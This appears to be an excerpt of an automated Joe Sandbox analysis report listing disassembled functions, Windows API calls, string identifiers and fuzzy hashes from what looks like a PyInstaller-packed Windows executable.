                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                    • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                    • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                    • Instruction ID: af8f5270a3ab3a0a3036792c9bee97f3e703a4e496ffdebd4539f8ee686ade3c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5221B13261A78182E622AB29B8417E7F294FB99384F800136EF8C9375DEFBCD145C750
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 995526605-0
                                                                                                                                                                                                                                    • Opcode ID: 70f390a37a83c39b0b93a8e81c7ccc07b23603dbaa07a0076cfadab7197a24fb
                                                                                                                                                                                                                                    • Instruction ID: c4c61c8401e5331d7924af190426d5a6140179d29da209a2eb848dfd01648c6b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70f390a37a83c39b0b93a8e81c7ccc07b23603dbaa07a0076cfadab7197a24fb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95217821A0D64242DA12AB5DB44413BE3A0FF927A0F900635D76D876EDEEBCD449C710
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                    • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                    • Instruction ID: b7df2a62a2aaea6be40c9e0cf40f393490a7c80dc4d355fcf58d23aee2dace7c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9021AF20A0F24281F65B776D555113BD2425F767B0F904634DB3E46BEEFDACA481CB20
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                    • String ID: CONOUT$
                                                                                                                                                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                    • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                    • Instruction ID: 614847d7d1537a0ea4eb4ee3cb15e8dcac57bbd8e028964497da16c8bb366705
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B11DA21719A4182E751AB1AE84833AF6A0FB99FE4F540234DB5D8B7ACEFBCD440C710
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68EFD
                                                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68F5A
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7B2B645F4,00000000,00007FF7B2B61985), ref: 00007FF7B2B693C9
                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68FE5
                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B69044
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B69055
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B6906A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
APIs
  • Part of subcall function 00007FF7B2B68570: GetCurrentProcess.KERNEL32 ref: 00007FF7B2B68590
  • Part of subcall function 00007FF7B2B68570: OpenProcessToken.ADVAPI32 ref: 00007FF7B2B685A3
  • Part of subcall function 00007FF7B2B68570: GetTokenInformation.ADVAPI32 ref: 00007FF7B2B685C8
  • Part of subcall function 00007FF7B2B68570: GetLastError.KERNEL32 ref: 00007FF7B2B685D2
  • Part of subcall function 00007FF7B2B68570: GetTokenInformation.ADVAPI32 ref: 00007FF7B2B68612
  • Part of subcall function 00007FF7B2B68570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7B2B6862E
  • Part of subcall function 00007FF7B2B68570: CloseHandle.KERNEL32 ref: 00007FF7B2B68646
• LocalFree.KERNEL32(?,00007FF7B2B63C55), ref: 00007FF7B2B6916C
• LocalFree.KERNEL32(?,00007FF7B2B63C55), ref: 00007FF7B2B69175
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262
APIs
• GetLastError.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B2D7
• FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B30D
• FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B33A
• FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B34B
• FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B35C
• SetLastError.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B377
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7B2B61B6A), ref: 00007FF7B2B6295E
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
• API String ID: 2050909247-2962405886
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7B2B6918F,?,00007FF7B2B63C55), ref: 00007FF7B2B62BA0
• MessageBoxW.USER32 ref: 00007FF7B2B62C2A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                    • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                    • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                    • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                    • Instruction ID: 9de56ca47da00e87fc75ee40be25587f8fa86a1a6711229040dbebca20a491f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9121F622709B4141E712AB28F4457ABB360EB99780F800136EF8D9771EFE7CD605C710
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7B2B61B99), ref: 00007FF7B2B62760
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                    • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                    • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                    • Instruction ID: bb278804ec79bb59d0a82ba856561de66fc3e02e2fb07cdb9abc2aeaac0d7e7f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8321B132A1A78192E622AB28B8417E7F294FB99384F800135EF8C9365DFFBCD545C750
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                    • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                    • Instruction ID: 2cf9eec0d28a3b01799bdef94bc928becf872a87f7c4ee6a2edd817592ddd47f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F0C821B0BB0681EA11AB2CE449777A320AF67760F940239C77E491FCEFACD044C320
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1156100317-0
                                                                                                                                                                                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                    • Instruction ID: 40825c11bb19e86264cf00e77f8fc6a26de56f152e4de1ce227f0087db0b184a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF115422E59E0241FE66315DE49937B9050AF77360E88863CE76E1F3DDAEFC5441C120
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3AF
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3CE
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3F6
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B407
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B418
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                                    • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                    • Instruction ID: 9c6c51e611f6a3f426660e9daab87d2896ac6e68b4e1a8cd5b178ddfbfaaa758
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4116020E0A60241FA5AB76D554117BE1415F767B0FD88334EB3E467EEFDACA482CA20
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
• Instruction ID: 778f0eb86af786077209efcf2a2ff65232c0431565b55728862296bd923a87c5
• Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
• Instruction Fuzzy Hash: 1C110620A0B20741FA9A766D445117B95424F77330F944734DB7E4A7EEFDACB481CA35

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
• Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
• Instruction ID: 0231efa70123edd18c0b60cb1611a801a5fb5267b659450d51a19f3e75dc0637
• Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
• Instruction Fuzzy Hash: 89912722A0A64641E762BE2CC45037FB690AB6AB54FC44139DB5D437E9FEBCE445C320

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
• Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
• Instruction ID: 53240b9420ff13b66af61ac065102b251f3630c372ae266e36ad504baedde3ee
• Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
• Instruction Fuzzy Hash: 1681A472D0A20285F766BE2D811027AB6A0EB33744FD54035CB0D972ADEFACE941D729

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2448990282.00007FFD93BF1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93BF0000, based on PE: true
• Associated: 00000002.00000002.2448927188.00007FFD93BF0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93C52000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93C9E000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93CA2000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93D01000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2448990282.00007FFD93D04000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2450214722.00007FFD93D05000.00000080.00000001.01000000.00000017.sdmp
• Associated: 00000002.00000002.2450302164.00007FFD93D07000.00000004.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93bf0000_SecuriteInfo.jbxd
Similarity
• API ID: 00007B2246570
• String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
• API String ID: 511975427-87138338
• Opcode ID: a874e1fbcb87b1679a70b041231bde324e11352f9bfe845f561d2f4bfc2a184d
